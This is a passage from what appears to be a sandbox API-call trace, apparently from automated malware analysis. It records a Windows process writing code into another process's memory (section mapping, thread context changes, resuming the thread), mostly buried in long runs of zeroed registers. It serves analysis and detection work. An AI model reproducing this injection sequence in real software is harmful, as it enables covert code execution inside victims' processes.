[104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0168.291] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0168.292] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x12e200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0x12f000) returned 0x0 [0168.302] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xb4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x12e200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x2040000, SectionOffset=0x0, ViewSize=0xde6e8*=0x12f000) returned 0x0 [0168.370] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0168.487] NtClose (Handle=0x140) returned 0x0 [0168.487] NtSetContextThread (ThreadHandle=0x138, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x27f000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x20db707, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0168.582] NtResumeThread (in: ThreadHandle=0x138, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0168.583] NtClose (Handle=0xb4) returned 0x0 [0168.583] NtClose (Handle=0x138) returned 0x0 [0168.590] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x9cc, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x138) returned 0x0 [0168.590] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0168.590] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0168.590] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x281000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0168.591] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0168.725] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x30c) | out: ThreadHandle=0xdea64*=0xb4) returned 0x0 [0168.725] NtSuspendThread (in: ThreadHandle=0xb4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0168.726] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0x138, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2620000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0168.856] NtGetContextThread (in: ThreadHandle=0xb4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x281000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, 